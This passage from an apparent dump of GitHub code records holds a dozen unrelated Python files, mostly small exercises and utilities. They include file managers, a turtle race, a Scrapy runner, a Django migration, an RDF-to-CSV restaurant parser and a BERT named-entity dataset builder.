fixtures\n \"\"\"\n if isinstance(file_name, Path):\n self.file = file_name\n else:\n self.file = Path(FIXTURES, file_name)\n\n @abstractmethod\n def load(self):\n pass\n\n @abstractmethod\n def save(self, data, mode):\n pass\n\n\nclass JSONManager(FileManager):\n\n @staticmethod\n def make_dict(vacancies: Vacancies) -> dict:\n \"\"\"\n Формирование словаря из объекта Vacancy.\n Собирает словарь из списка объектов вакансий.\n Добавляются в словарь только вакансии НЕ отмеченные к удалению\n \"\"\"\n\n data = dict()\n for item in vacancies.list:\n if not item.is_to_removed:\n data[item.vacancy_id] = {'service': item.service,\n 'title': item.title,\n 'date': item.date,\n 'area': item.area,\n 'currency': item.currency,\n 'salary_fom': item.salary_fom,\n 'salary_to': item.salary_to,\n 'url': item.url,\n 'is_favorite': item.is_favorite\n }\n return data\n\n def load(self) -> dict:\n \"\"\"\n Чтение файла\n :return: словарь с данными из файла\n \"\"\"\n try:\n with open(self.file, 'r', encoding='UTF-8') as json_file:\n data = json.load(json_file)\n except JSONDecodeError:\n return dict()\n except FileNotFoundError:\n print(f'Файл не найден {self.file}')\n return dict()\n return data\n\n def save(self, data, mode='w'):\n \"\"\"\n Сохранение данных в файл. 
Если файла не существует, он будет создан.\n :param data: исходные данные\n :param mode: режим переписывания файла \"w\", дописывания \"a\"\n \"\"\"\n if not Path(self.file).exists():\n mode = 'a'\n with open(self.file, mode, encoding='UTF-8') as json_file:\n json.dump(data, json_file, ensure_ascii=False, indent=4)\n\n def save_vacancies(self, vacancies: Vacancies, log=False) -> None:\n \"\"\"\n Обновление файла с вакансиями из списка вакансий\n :param vacancies: экземпляр класса с вакансиями\n :param log: вывод сообщения о количестве записанных вакансий\n \"\"\"\n new_data = self.make_dict(vacancies)\n if Path(self.file).exists():\n data = self.load()\n n_old = len(data)\n data.update(new_data)\n for i in vacancies.list:\n if i.is_to_removed and data.get(i.vacancy_id):\n del data[i.vacancy_id]\n mode = 'w'\n else:\n n_old = 0\n data = new_data\n mode = 'a'\n\n with open(self.file, mode, encoding='UTF-8') as json_file:\n json.dump(data, json_file, ensure_ascii=False, indent=4)\n n_new = len(self.load())\n\n if log:\n msg = f'Добавлено вакансий: {n_new - n_old}. Всего в базе: {n_new}'\n print(msg, '\\n', '-' * len(msg))\n time.sleep(3)\n\n\nclass YAMLManager(FileManager):\n\n def load(self) -> dict:\n \"\"\"\n Чтение файла\n :return: словарь с данными из файла\n \"\"\"\n try:\n with open(self.file, \"r\", encoding=\"UTF-8\") as yaml_file:\n data = yaml.safe_load(yaml_file)\n except FileNotFoundError:\n print(f'Файл не найден {self.file}')\n return dict()\n if data is None:\n return dict()\n return data\n\n def save(self, data, mode='w') -> None:\n \"\"\"\n Сохранение данных в файл. Если файла не существует, он будет создан.\n :param data: исходные данные\n :param mode: режим переписывания файла \"w\", дописывания \"a\"\n \"\"\"\n if not Path(self.file).exists():\n mode = 'a'\n with open(self.file, mode, encoding=\"UTF-8\") as yaml_file:\n yaml.safe_dump(data, yaml_file, sort_keys=False, allow_unicode=True)\n","repo_name":"ualex90/Coursework_4","sub_path":"src/utils/file_manager.py","file_name":"file_manager.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"70676362377","text":"with open(file_name, \"r\") as fn:\n words = fn.readlines()\n\ndic = {}\nfor word in words:\n if word[0] != \"t\":\n continue\n if word not in dic:\n dic[word] = 1\n else:\n dic[word] += 1\n\nl = []\nfor word in dic.keys():\n l.append((word, dic[word]))\nl.sort(key=lambda x: x[1])\n\ncounter = 0\nfor tp in l:\n print(tp)\n counter += 1\n if counter == 10:\n break","repo_name":"XMK233/Leetcode-Journey","sub_path":"code_test-2021/华控清交2.py","file_name":"华控清交2.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11444436752","text":"n=int(input())\nstack=[]\nfor i in range(n):\n stack.append(int(input()))\nm=int(input())\nn=[]\nfor j in range(m):\n a=list(input().split())\n if a[0]=='A':\n stack.append(a[1])\n else:\n if(stack==[]):\n print(\"No\")\n break\n n.append(stack.pop(-1))\nif stack!=[]:\n while n!=[]:\n print(n.pop(0),end=' ')\n print(\"\\n\",end='')\nwhile stack!=[]:\n print(stack.pop(-1),end=' ')","repo_name":"Harahan/BUAA-python-data-structure-2021","sub_path":"python_work/week4/t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"17914158294","text":"from turtle import Turtle 
\nfrom random import randint\n\nlaura = Turtle()\n\nlaura.color('red')\nlaura.shape('turtle')\n\nlaura.penup()\nlaura.goto(-160,100)\nlaura.pendown()\n\nrik = Turtle()\n\nrik.color('green')\nrik.shape('turtle')\n\nrik.penup()\nrik.goto(-160,70)\nrik.pendown()\n\nlauren = Turtle()\n\nlauren.color('blue')\nlauren.shape('turtle')\n\nlauren.penup()\nlauren.goto(-160,40)\nlauren.pendown()\n\ncarren = Turtle()\n\ncarren.color('pink')\ncarren.shape('turtle')\n\ncarren.penup()\ncarren.goto(-160,10)\ncarren.pendown()\n\nfor movement in range(120):\n laura.forward(randint(1,5))\n rik.forward(randint(1,5))\n lauren.forward(randint(1,5))\n carren.forward(randint(1,5))\n if(laura.xcor()>=185):\n print(\"laura won\")\n exit()\n if(rik.xcor()>=185):\n print(\"rik won\")\n exit()\n if(lauren.xcor()>=185):\n print(\"lauren won\")\n exit()\n if(carren.xcor()>=185):\n print(\"carren won\")\n exit()\n","repo_name":"Roshni0/Games","sub_path":"Turtle/race.py","file_name":"race.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"15771401132","text":"import pip\nimport subprocess\nimport time\nimport csv\nimport glob\nfrom shutil import copy2\nimport sys\nimport getpass\nimport os\nfrom pathlib import Path\nfrom datetime import datetime, timedelta\nfrom os.path import exists, abspath, join, isdir, isfile\n# Get PATH conf\nfrom conf import PATH\n\nCATALOGUE_PATH = abspath(join(PATH[\"download_path\"],\"images\",\"{0}\"))\nFINAL_OUTPUT_PATH = join(PATH[\"final_output_path\"], \"{0}\")\n\n# Get next Monday from current date\ndef get_last_monday():\n cur_time = datetime.now()\n last_monday = cur_time - timedelta(days=cur_time.weekday())\n last_monday = last_monday.replace(hour=6, minute=0)\n date_range = cur_time - last_monday\n # Check today is Monday (time before 8h00 AM)\n if date_range.days == -1:\n last_monday = cur_time - timedelta(days=cur_time.weekday()+7)\n last_monday_folder = last_monday.strftime(\"%Y%m%d\")\n else:\n last_monday_folder = last_monday.strftime(\"%Y%m%d\")\n \n return last_monday_folder\n \ndef get_next_monday():\n # Get next Monday from current date\n cur_time = datetime.now()\n last_monday = cur_time - timedelta(days=cur_time.weekday())\n last_monday = last_monday.replace(hour=9, minute=0)\n date_range = cur_time - last_monday\n # Check today is Monday (time before 8h00 AM)\n if date_range.days == -1:\n next_monday_folder = last_monday.strftime(\"%Y%m%d\")\n else:\n next_monday = cur_time - timedelta(days=cur_time.weekday()-7)\n next_monday_folder = next_monday.strftime(\"%Y%m%d\")\n \n return next_monday_folder\n \ndef import_or_install(package):\n try:\n __import__(package)\n except ImportError:\n pip.main(['install', package])\n \ndef copy_to_local_sharepoint():\n print(\"\\n\\t>>> COPYING TO FINAL PATH...\")\n last_monday_folder = get_next_monday()\n \n cata_path = CATALOGUE_PATH.format(last_monday_folder)\n final_path = FINAL_OUTPUT_PATH.format(last_monday_folder)\n if exists(cata_path):\n for cat_name_dir in os.listdir(cata_path):\n cat_name_path = join(cata_path, cat_name_dir)\n if isdir(cat_name_path):\n for cat_file_dir in os.listdir(cat_name_path):\n cat_files_path = join(cat_name_path, cat_file_dir)\n if isdir(cat_files_path):\n final_file_path = join(final_path, cat_name_dir, cat_file_dir)\n if not exists(final_file_path):\n Path(final_file_path).mkdir(parents=True, exist_ok=True)\n for cat_file in os.listdir(cat_files_path):\n cat_file_path = join(cat_files_path, cat_file)\n 
if isfile(cat_file_path) and cat_file.endswith(\".pdf\"):\n print(\"\\t[COPY]:{0}\".format(cat_file))\n copy2(cat_file_path, final_file_path)\n \ndef main(scrapy_arg, option=None):\n package_list = [\"scrapy\", \"img2pdf\"]\n for package in package_list:\n import_or_install(package)\n \n print(\"\\n\\t------------------ GET CATALOGUES ------------------\")\n print(\"\\n\\t>> Using SCRAPY\")\n if option == None:\n print(\"\\n\\t1. Get all new catalogues.\")\n print(\"\\t2. Get only catalogue or all catalogues from one brand\")\n print(\"\\t3. Run test-catalogue\")\n print(\"\\t4. Exit\")\n option = input(\"\\n\\tEnter: \")\n\n while True:\n print(\"\\n\\n\\t[ {0} ]\".format(datetime.now().strftime(\"%Y-%m-%d %H:%M\")))\n print(\"\\n\\t>> RUNNING...\")\n if option == \"1\":\n subprocess.call([\"scrapy\", \"crawl\", \"catalogues\", \"--nolog\"])\n print(\"\\n\\t********************** FINISH **********************\")\n elif option == \"2\":\n subprocess.call([\"scrapy\", \"crawl\", \"special-catalogue\"])\n print(\"\\n\\t********************** FINISH **********************\")\n elif option == \"3\":\n subprocess.call([\"scrapy\", \"crawl\", \"test-catalogue\"])\n print(\"\\n\\t********************** FINISH **********************\")\n elif option == \"4\":\n return None\n else:\n print(\"Wrong number\")\n break\n \n # COLLECT ALL CATALOGUES FOR 1 WEEK and SEND BY EMAIL (PENDING)\n # -------------------------------------------------------------\n copy_to_local_sharepoint()\n # -------------------------------------------------------------\n print(\"\\n\\n\\t>> RUN AGAIN IN 24 HOURS\")\n time.sleep(60*60*24)\n\n #input(\"Press any keys to Exit\")\n\n# Using python RUN.py --weekly --nolog\n# for weekly Catalogues\nif __name__ == \"__main__\":\n option = None\n scrapy_arg = []\n \n for arg in sys.argv:\n if arg == '--weekly':\n option = '1'\n elif arg == '--special':\n option = '2'\n elif arg.startswith(\"--\"):\n scrapy_arg.append(arg)\n \n main(scrapy_arg, option)","repo_name":"tienking/catalogues_with_scrapy","sub_path":"catalogues/RUN.py","file_name":"RUN.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"12111672274","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n \n ret = [[]]\n #at each step: adds current number to everything in list (while preserving current list)\n for num in nums:\n length = len(ret)\n for i in range(0, length):\n ret.append(ret[i] + [num])\n \n return ret\n\n#runtime: O(n^2)?\n#memory: O(n^2)?","repo_name":"noahlwest/leetcode","sub_path":"python/medium/78_Subsets.py","file_name":"78_Subsets.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"20214057241","text":"# Function to take a string as an arguement and return the number of times the string \"code\" appears in the string.\r\n\r\n\"\"\"\r\nPseudocode\r\n\r\nDEFINE function 'strcount(s)'\r\n get the length of 's' and assign it to variable 'length'\r\n set variable 'count' = 0\r\n FOR 'i' in range (start = 0, end = length-3, iteration = 1)\r\n IF s character [i] = \"c\"\r\n IF s character[i+1]=\"o\"\r\n IF s character [i+2] = \"d\"\r\n IF s character [1+3] = \"e\"\r\n count = count + 1\r\n print \"The string \"code\" appears\" count \"times in your string\"\r\n RETURN count\r\n \r\n\r\n\"\"\"\r\n\r\n# Since this is far too easy with the s.count function, I'm assuming we are to do 
it from first principles?\r\ndef strcount(s):\r\n length=len(s)\r\n count=0\r\n for i in range(length-3):\r\n if s[i]==\"c\":\r\n if s[i+1]==\"o\":\r\n if s[i+2]==\"d\":\r\n if s[i+3]==\"e\":\r\n count+=1\r\n print(\"The string \\\"code\\\" appears\", count, \"time(s) in your string\")\r\n return count\r\n\r\n# Container to request arguement and call function\r\ns=str(input(\"please enter a string to check: \"))\r\nstrcount(s)\r\n","repo_name":"VectorSigmaGen1/Basic_Introductory_Python","sub_path":"Practical 18 - 17th October 2019/p18p2.py","file_name":"p18p2.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26340298153","text":"import glob\nimport subprocess\nimport json\nimport os\n\nfolders = glob.glob(\"_codefolders/*\")\n\nlangs = {}\n\nfor folder in folders:\n\tprint(folder)\n\tfoldername = folder.split(\"/\")[-1]\n\tdatadir = os.path.expanduser(\"~/.slocdata/{}\".format(foldername))\n\t#os.makedirs(datadir, exist_ok=True)\n\t#cmd = \"sloccount --cached --datadir {} {}\".format(datadir, folder)\n\tcmd = \"sloccount {}\".format(folder)\n\tp = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE)\n\ts = p.stdout.decode()\n\tinstats = False\n\tfor line in s.split(\"\\n\"):\n\t\tline = line.strip()\n\t\tif line.startswith(\"Totals grouped by\"):\n\t\t\tinstats = True\n\t\telif instats:\n\t\t\tif not line:\n\t\t\t\tinstats = False\n\t\t\telse:\n\t\t\t\tlang, num, pct = line.split()\n\t\t\t\tlang = lang[:-1]\n\t\t\t\tnum = int(num)\n\t\t\t\tpct = float(pct[1:-2])\n\t\t\t\tprint(\"#\", lang, num, pct)\n\t\t\t\tif not foldername in langs:\n\t\t\t\t\tlangs[foldername] = []\n\t\t\t\tlangs[foldername].append((lang, num, pct))\n\nf = open(\"sloc.json\", \"w\")\njson.dump(langs, f)\nf.close()\n","repo_name":"serviceprototypinglab/aws-sar-analysis","sub_path":"githubstats/sloc.py","file_name":"sloc.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"17780048403","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport likeable.models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('likeable', '0008_auto_20141001_1350'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='downloadedarticle',\n name='fields_dirty',\n ),\n migrations.AddField(\n model_name='downloadedarticle',\n name='body_text',\n field=models.TextField(null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='downloadedarticle',\n name='scrape_when',\n field=models.DateTimeField(null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='urlsignature',\n name='body_text_selector',\n field=models.CharField(max_length=1000, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='urlsignature',\n name='modified_when',\n field=models.DateTimeField(default=likeable.models.utcnow),\n preserve_default=True,\n ),\n ]\n","repo_name":"schwa-lab/sharingnews","sub_path":"likeable/migrations/0009_auto_20141003_0446.py","file_name":"0009_auto_20141003_0446.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"4372456254","text":"import torch\r\nimport hyperparameters as hps\r\nimport utils\r\nimport numpy as np\r\nfrom dataloader import DataLoader\r\n\r\n\r\ndef 
embedding(model_path, input_data_path):\r\n sec2sec = torch.load(model_path)\r\n dataloader = DataLoader(input_data_path)\r\n audios = torch.from_numpy(dataloader.data).cuda().float()\r\n num_audios = audios.shape[1]\r\n\r\n encoder = sec2sec.encoder\r\n\r\n embedding_vectors = np.zeros((num_audios, hps.latent_vector_length))\r\n batch_start_index = 0\r\n while batch_start_index + hps.batch_size < num_audios:\r\n vector = encoder(audios[:, batch_start_index:batch_start_index + hps.batch_size, :], hps.batch_size).detach()\r\n embedding_vectors[batch_start_index:batch_start_index + hps.batch_size, :] = vector.cpu().numpy()\r\n batch_start_index += hps.batch_size\r\n print(\"Embedded {} audios.\".format(batch_start_index))\r\n\r\n vector = encoder(audios[:, batch_start_index:num_audios, :], num_audios - batch_start_index).detach()\r\n embedding_vectors[batch_start_index:, :] = vector.cpu().numpy()\r\n print(\"Embedded {} audios.\".format(num_audios))\r\n return embedding_vectors\r\n\r\nif __name__ == \"__main__\":\r\n model_path = \"{}/sec2sec_mfcc_{}.pkl\".format(hps.model_dir, 5900)\r\n input_data_path = hps.mfcc_path\r\n output_data_path = \"mfcc_embedding_vector.pkl\"\r\n embedding_vectors = embedding(model_path, input_data_path)\r\n utils.save_pickle(output_data_path, embedding_vectors)\r\n","repo_name":"bryanwuAC/audio2vec","sub_path":"sec2sec/embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"44706482973","text":"# coding: utf-8\n\nimport csv\n\nfrom HTMLParser import HTMLParser\n\nallrest=[]\n\n\nclass restaurant(object):\n nom = \"\"\n adreca = \"\"\n districte = \"\"\n barri = \"\"\n postal = \"\"\n telefon = \"\"\n telefon2 = \"\"\n latitud = \"\"\n longitud = \"\"\n web = \"\"\n\n def afegir_nom(self, nom):\n if self.nom == \"\":\n self.nom = nom\n else:\n self.nom = self.nom + '&' + nom\n\n def afegir_adreca(self, adreca):\n if adreca.find('C') == 0:\n self.adreca = \"Carrer\" + adreca[1:]\n elif adreca.find('P') == 0 and adreca.find('l') == 1:\n self.adreca = \"Plaça\" + adreca[2:]\n elif adreca.find('G') == 0 and adreca.find('V') == 2:\n self.adreca = \"Gran Via\" + adreca[4:]\n elif adreca.find('A') == 0 and adreca.find('v') == 1:\n self.adreca = \"Avinguda\" + adreca[2:]\n elif adreca.find('P') == 0 and adreca.find('t') == 1 and adreca.find('g') == 2 and adreca.find('e') == 3:\n self.adreca = \"Passatge\" + adreca[4:]\n elif adreca.find('P') == 0 and adreca.find('g') == 1:\n self.adreca = \"Passeig\" + adreca[2:]\n elif adreca.find('R') == 0 and adreca.find('b') == 1 and adreca.find('l') == 2 and adreca.find('a') == 3:\n self.adreca = \"Rambla\" + adreca[4:]\n elif adreca.find('P') == 0 and adreca.find('t') == 1 and adreca.find('j') == 2 and adreca.find('a') == 3:\n self.adreca = \"Platja\" + adreca[4:]\n elif adreca.find('T') == 0 and adreca.find('r') == 1 and adreca.find('a') == 2 and adreca.find('v') == 3:\n self.adreca = \"Travessera\" + adreca[4:]\n else:\n self.adreca = adreca\n\n def afegir_districte(self, districte):\n self.districte = districte\n\n def afegir_barri(self, barri):\n self.barri = barri\n\n def afegir_postal(self, postal):\n self.postal = postal\n\n def afegir_telefon(self, telefon):\n if telefon.find('+34') != -1:\n if self.telefon != \"\" and telefon != self.telefon:\n self.telefon2 = telefon\n else:\n self.telefon = telefon\n\n def afegir_latitud(self, latitud):\n self.latitud = latitud\n\n def 
afegir_longitud(self, longitud):\n self.longitud = longitud\n\n def afegir_web(self, web):\n webdos = ' '.join(web[0])\n pag_web_ini = webdos.find('http')\n if pag_web_ini != -1:\n self.web = webdos[pag_web_ini:]\n\n\nclass MHTMLParser(HTMLParser):\n\n crest = restaurant()\n ctag = \"\"\n\n def handle_starttag(self, tag, attrs):\n self.ctag = tag\n if tag == 'v:vcard':\n self.crest = restaurant()\n if tag == 'v:url':\n self.crest.afegir_web(attrs)\n\n def handle_endtag(self, tag):\n self.ctag = \"\"\n if tag == 'v:vcard':\n allrest.append(self.crest)\n\n def handle_data(self, data):\n if self.ctag == 'v:fn':\n self.crest.afegir_nom(data)\n if self.ctag == 'v:street-address':\n self.crest.afegir_adreca(data)\n if self.ctag == 'xv:district':\n self.crest.afegir_districte(data)\n if self.ctag == 'xv:neighborhood':\n self.crest.afegir_barri(data)\n if self.ctag == 'v:postal-code':\n self.crest.afegir_postal(data)\n if self.ctag == 'rdf:value':\n self.crest.afegir_telefon(data)\n if self.ctag == 'v:latitude':\n self.crest.afegir_latitud(data)\n if self.ctag == 'v:longitude':\n self.crest.afegir_longitud(data)\n\n\n\nf = open('restaurants.rdf', 'rb') # obre l'arxiu\nrdfSource = f.read()\nf.close()\n\ncsvOpen = open('restaurants.csv', 'wb')\ncsvSource = csv.writer(csvOpen)\n\nparser = MHTMLParser()\nparser.feed(rdfSource)\n\ncsvSource.writerow([\"Nom\"] + [\"Adreça\"] + [\"Districte\"] + [\"Barri\"] + [\"Codi Postal\"] + [\"Telèfon\"] +\n[\"Telèfon 2\"] + [\"Latitud\"] + [\"Longitud\"] + [\"Web\"])\nfor r in allrest:\n csvSource.writerow([r.nom] + [r.adreca] + [r.districte] + [r.barri] + [r.postal] + [r.telefon] +\n [r.telefon2] + [r.latitud] + [r.longitud] + [r.web])","repo_name":"garoi/Python","sub_path":"Practica/Script1.py","file_name":"Script1.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7479048480","text":"def menu(*args): # any number of positional arguments; args is then a tuple containing them\n while True:\n s = input(f'Enter choice ({args}): ').strip()\n \n if s in args:\n return s # did the user choose one of the elements of args? 
Return it!\n\n print(f'{s} is not a valid option; try again!')\n\n# were we run interactively, and *NOT* imported?\n# give the user a demo of our menu function!\nif __name__ == '__main__':\n user_choice = menu('a', 'b', 'c')\n print(f'You chose {user_choice}')","repo_name":"amauryrs/Cisco-2023-09September-26-modules","sub_path":"menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"30941567420","text":"import copy\nimport random\nfrom typing import Dict, List, Tuple\nimport warnings\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom transformers import BertTokenizer\n\nfrom data_processing.tokenization import sentenize_text_with_ners\n\n\ndef transform_indicator_to_classmatrix(indicator: List[int]) -> np.ndarray:\n max_seq_len = len(indicator)\n one_hot_indicator = np.zeros((1, max_seq_len, 5), dtype=np.float32)\n for token_idx in range(len(indicator)):\n if indicator[token_idx] > 0:\n if (token_idx > 0) and (token_idx < (max_seq_len - 1)):\n if indicator[token_idx - 1] > 0:\n if indicator[token_idx] > 1:\n if indicator[token_idx + 1] > 0:\n class_idx = 1 # start ent\n else:\n class_idx = 3 # start-end ent\n else:\n if indicator[token_idx + 1] > 1:\n class_idx = 2 # end ent\n elif indicator[token_idx + 1] > 0:\n class_idx = 3 # middle ent\n else:\n class_idx = 2 # end ent\n elif indicator[token_idx + 1] > 0:\n if indicator[token_idx + 1] > 1:\n class_idx = 4 # start-end ent\n else:\n class_idx = 1 # start ent\n else:\n class_idx = 4 # start-end ent\n elif token_idx > 0: # token_idx == (max_seq_len - 1)\n if indicator[token_idx - 1] > 0:\n if indicator[token_idx - 1] > 1:\n class_idx = 4 # start-end ent\n else:\n class_idx = 2 # end ent\n else:\n class_idx = 4 # start-end ent\n else: # token_idx == 0\n if indicator[token_idx + 1] > 0:\n if indicator[token_idx + 1] > 1:\n class_idx = 4 # start-end ent\n else:\n class_idx = 1 # start ent\n else:\n class_idx = 4 # start-end ent\n else:\n class_idx = 0 # no ent\n one_hot_indicator[0, token_idx, class_idx] = 1.0\n return one_hot_indicator\n\n\ndef build_trainset_for_ner(data: Dict[int,\n Tuple[str, List[Tuple[str, int, int]]]],\n tokenizer: BertTokenizer, max_seq_len: int,\n entities: List[str]) \\\n -> Tuple[np.ndarray, List[np.ndarray]]:\n if 'O' in entities:\n err_msg = f'The entities list {entities} is wrong ' \\\n f'because it contains the `O` entity.'\n raise ValueError(err_msg)\n list_of_tokenized_texts = []\n list_of_ne_indicators = []\n max_seq_len_ = max_seq_len\n print(f'Number of texts is {len(data)}.')\n for cur_id in tqdm(sorted(list(data.keys()))):\n text, ners = data[cur_id]\n batch = sentenize_text_with_ners(\n s=text,\n tokenizer=tokenizer,\n ners=ners,\n ne_vocabulary=entities\n )\n for tokenized_text, ne_indicators in batch:\n list_of_tokenized_texts.append(tokenized_text)\n list_of_ne_indicators.append(ne_indicators)\n if len(tokenized_text) > max_seq_len_:\n max_seq_len_ = len(tokenized_text)\n print(f'Number of sentences is {len(list_of_tokenized_texts)}.')\n X = []\n y = [[] for _ in range(len(entities))]\n for tokenized_text, ne_indicators in zip(list_of_tokenized_texts,\n list_of_ne_indicators):\n ne_indicators_ = copy.copy(ne_indicators)\n while len(tokenized_text) < max_seq_len_:\n tokenized_text.append(tokenizer.pad_token)\n for ne_id in range(len(entities)):\n ne_indicators_[ne_id].append(0)\n X.append(tokenizer.convert_tokens_to_ids(tokenized_text))\n for ne_id in range(len(entities)):\n 
y[ne_id].append(\n transform_indicator_to_classmatrix(ne_indicators_[ne_id])\n )\n del ne_indicators_\n X = np.array(X, dtype=np.int32)\n y = [np.concatenate(cur, axis=0) for cur in y]\n if X.shape[1] == max_seq_len:\n return X, y\n indices_of_long_texts = []\n for sample_idx in range(X.shape[0]):\n is_padding = True\n for token_idx in range(max_seq_len, X.shape[1]):\n if X[sample_idx, token_idx] != tokenizer.pad_token_id:\n is_padding = False\n break\n if not is_padding:\n indices_of_long_texts.append(sample_idx)\n iteration = 1\n while len(indices_of_long_texts) > 0:\n print(f'Iter {iteration}: '\n f'there are {len(indices_of_long_texts)} very long texts!')\n new_X = np.full(\n shape=(len(indices_of_long_texts), max_seq_len_),\n fill_value=tokenizer.pad_token_id,\n dtype=np.int32\n )\n new_y = [np.zeros((len(indices_of_long_texts), max_seq_len_, 5),\n dtype=np.float32) for _ in range(len(y))]\n ndiff = max_seq_len_ - max_seq_len\n for local_idx, global_idx in enumerate(indices_of_long_texts):\n new_X[local_idx, 0:ndiff] = X[global_idx, max_seq_len:]\n X[global_idx, max_seq_len:] = tokenizer.pad_token_id\n for output_idx in range(len(y)):\n new_y[output_idx][local_idx, 0:ndiff, :] = \\\n y[output_idx][global_idx, max_seq_len:, :]\n y[output_idx][global_idx, max_seq_len:, :] = 0.0\n X = np.concatenate((X, new_X), axis=0)\n y = [np.concatenate((y[output_idx], new_y[output_idx]), axis=0)\n for output_idx in range(len(y))]\n indices_of_long_texts = []\n for sample_idx in range(X.shape[0]):\n is_padding = True\n for token_idx in range(max_seq_len, X.shape[1]):\n if X[sample_idx, token_idx] != tokenizer.pad_token_id:\n is_padding = False\n break\n if not is_padding:\n indices_of_long_texts.append(sample_idx)\n iteration += 1\n X = X[:, :max_seq_len]\n y = [cur[:, :max_seq_len, :] for cur in y]\n print(f'Number of sentences after cutting is {X.shape[0]}.')\n return X, y\n\n\ndef build_trainset_for_siam(data: Dict[int,\n Tuple[str, List[Tuple[str, int, int]]]],\n tokenizer: BertTokenizer, max_seq_len: int,\n entities: List[str], max_samples: int) \\\n -> Tuple[Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray],\n np.ndarray]:\n eps = 1e-6\n X, y = build_trainset_for_ner(data, tokenizer, max_seq_len, entities)\n entities_in_data = {'O': []}\n for sample_idx in range(X.shape[0]):\n start_pos = -1\n for token_idx in range(X.shape[1]):\n if X[sample_idx, token_idx] == tokenizer.pad_token_id:\n if start_pos >= 0:\n entities_in_data['O'].append(\n (\n sample_idx,\n (start_pos, token_idx)\n )\n )\n start_pos = -1\n break\n is_entity = False\n for ent_id in range(len(entities)):\n if y[ent_id][sample_idx, token_idx, 0] < eps:\n is_entity = True\n break\n if is_entity:\n if start_pos >= 0:\n entities_in_data['O'].append(\n (\n sample_idx,\n (start_pos, token_idx)\n )\n )\n start_pos = -1\n else:\n if start_pos < 0:\n start_pos = token_idx\n if start_pos >= 0:\n entities_in_data['O'].append(\n (\n sample_idx,\n (start_pos, X.shape[1])\n )\n )\n for ent_id, ent_type in enumerate(entities):\n entities_in_data[ent_type] = []\n for sample_idx in range(X.shape[0]):\n start_pos = -1\n for token_idx in range(X.shape[1]):\n if X[sample_idx, token_idx] == tokenizer.pad_token_id:\n if start_pos >= 0:\n entities_in_data[ent_type].append(\n (\n sample_idx,\n (start_pos, token_idx)\n )\n )\n start_pos = -1\n break\n if y[ent_id][sample_idx, token_idx, 0] >= eps:\n if start_pos >= 0:\n entities_in_data[ent_type].append(\n (\n sample_idx,\n (start_pos, token_idx)\n )\n )\n start_pos = -1\n else:\n if start_pos < 0:\n 
start_pos = token_idx\n if start_pos >= 0:\n entities_in_data[ent_type].append(\n (\n sample_idx,\n (start_pos, X.shape[1])\n )\n )\n del y\n used_pairs = set()\n X_left_tokens = np.empty((max_samples, max_seq_len), dtype=np.int32)\n X_left_masks = np.zeros((max_samples, max_seq_len), dtype=np.int32)\n X_right_tokens = np.empty((max_samples, max_seq_len), dtype=np.int32)\n X_right_masks = np.zeros((max_samples, max_seq_len), dtype=np.int32)\n y = np.empty((max_samples, 1), dtype=np.float32)\n entities_and_O = entities + ['O']\n counter = 0\n for _ in tqdm(range(max_samples)):\n first_entity = random.choice(entities_and_O)\n idx = entities_and_O.index(first_entity)\n if random.random() > 0.3:\n second_entity = random.choice(\n entities_and_O[:idx] + entities_and_O[(idx + 1):]\n )\n else:\n second_entity = first_entity\n first_sample = random.choice(entities_in_data[first_entity])\n second_sample = random.choice(entities_in_data[second_entity])\n while second_sample == first_sample:\n second_sample = random.choice(entities_in_data[second_entity])\n if (first_sample, second_sample) in used_pairs:\n for _ in range(100):\n first_sample = random.choice(entities_in_data[first_entity])\n second_sample = random.choice(entities_in_data[second_entity])\n while second_sample == first_sample:\n second_sample = random.choice(\n entities_in_data[second_entity]\n )\n if (first_sample, second_sample) in used_pairs:\n warn_msg = f'The pair {first_entity}-{second_entity} is not found.'\n warnings.warn(warn_msg)\n X_left_tokens[counter] = X[first_sample[0]]\n X_right_tokens[counter] = X[second_sample[0]]\n for token_idx in range(first_sample[1][0], first_sample[1][1]):\n X_left_masks[counter, token_idx] = 1\n for token_idx in range(second_sample[1][0], second_sample[1][1]):\n X_right_masks[counter, token_idx] = 1\n if first_entity == second_entity:\n y[counter, 0] = 1.0\n else:\n y[counter, 0] = 0.0\n counter += 1\n 